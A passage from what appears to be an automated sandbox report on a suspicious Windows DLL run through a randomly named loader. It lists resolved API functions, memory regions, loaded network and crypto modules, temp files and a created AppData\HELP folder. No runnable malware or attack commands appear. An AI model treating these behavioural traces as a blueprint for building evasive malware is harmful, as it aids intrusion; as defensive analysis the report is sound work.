1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 4 |
|
1 | |
| Map | - | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Map | - | process_name = c:\windows\system32\gorctexxzx.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 93928 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #7: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa9c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00390fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0073ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72dd0000 | 0x72e14fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94006 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #8: gorctexxzx.exe
1376
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaac |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AB0
0x
AC4
0x
DE8
0x
ECC
0x
ED0
0x
ED4
0x
810
0x
820
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x00287fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| tzres.dll | 0x002c0000 | 0x002c0fff | Memory Mapped File | Readable |
|
|
|
- |
| ~fgf7f5.tmp | 0x002c0000 | 0x002c0fff | Memory Mapped File | Readable |
|
|
|
|
| ~fgf844.tmp | 0x002c0000 | 0x002c0fff | Memory Mapped File | Readable |
|
|
|
|
| 6f6c657374646d702e6f6378ff.tmp | 0x002c0000 | 0x002c0fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0113ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001140000 | 0x01140000 | 0x011affff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001260000 | 0x01260000 | 0x0135ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001370000 | 0x01370000 | 0x013affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000013b0000 | 0x013b0000 | 0x0148efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000014d0000 | 0x014d0000 | 0x015cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001630000 | 0x01630000 | 0x0172ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001730000 | 0x01730000 | 0x0182ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001850000 | 0x01850000 | 0x0194ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001950000 | 0x01950000 | 0x01d42fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01e9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fd0000 | 0x01fd0000 | 0x020cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x021cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x0232ffff | Private Memory | Readable, Writable |
|
|
|
- |
| cabinet.dll | 0x72d70000 | 0x72d84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cabinet.dll | 0x72dc0000 | 0x72dd4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dhcpcsvc.dll | 0x73fc0000 | 0x73fd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dhcpcsvc6.dll | 0x74030000 | 0x7403cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x74a00000 | 0x74a12fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74d30000 | 0x74d6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x75820000 | 0x75863fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x75f40000 | 0x75f4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76050000 | 0x7616cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x763f0000 | 0x765eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76600000 | 0x766f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x77830000 | 0x77965fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x77c70000 | 0x77c74fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
